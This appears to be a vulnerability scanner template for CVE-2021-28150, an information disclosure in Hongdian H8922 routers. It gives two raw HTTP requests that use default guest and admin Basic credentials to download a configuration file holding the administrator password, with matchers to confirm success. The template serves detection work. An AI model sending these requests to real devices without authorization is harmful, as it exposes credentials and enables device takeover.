id: CVE-2021-28150 info: name: Hongdian H8922 3.0.5 - Information Disclosure author: gy741 severity: medium description: Hongdian H8922 3.0.5 is susceptible to information disclosure. An attacker can access cli.conf (with the administrator password and other sensitive data) via /backup2.cgi and thereby possibly obtain sensitive information, modify data, and/or execute unauthorized operations. remediation: | Apply the latest security patch or update provided by Hongdian to fix the information disclosure vulnerability (CVE-2021-28150). reference: - https://ssd-disclosure.com/ssd-advisory-hongdian-h8922-multiple-vulnerabilities/ - http://en.hongdian.com/Products/Details/H8922 - https://nvd.nist.gov/vuln/detail/CVE-2021-28150 classification: cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N cvss-score: 5.5 cve-id: CVE-2021-28150 cwe-id: CWE-425 epss-score: 0.00339 epss-percentile: 0.68229 cpe: cpe:2.3:o:hongdian:h8922_firmware:3.0.5:*:*:*:*:*:*:* metadata: max-request: 2 vendor: hongdian product: h8922_firmware tags: cve,cve2021,hongdian,exposure http: - raw: - | GET /backup2.cgi HTTP/1.1 Host: {{Hostname}} Authorization: Basic Z3Vlc3Q6Z3Vlc3Q= - | GET /backup2.cgi HTTP/1.1 Host: {{Hostname}} Authorization: Basic YWRtaW46YWRtaW4= matchers-condition: and matchers: - type: word part: header words: - "application/octet-stream" - type: word part: body words: - "CLI configuration saved from vty" - "service webadmin" - type: status status: - 200 # digest: 4a0a00473045022100e74ec0e9492d911faf474df428066b3fb692c30c34c1207d80359cae9fa0024a02201652f24294d9f582e4246fc1b31e541add12a3e740897ed9cf582dc23293228e:922c64590222798bb761d5b6d8e72950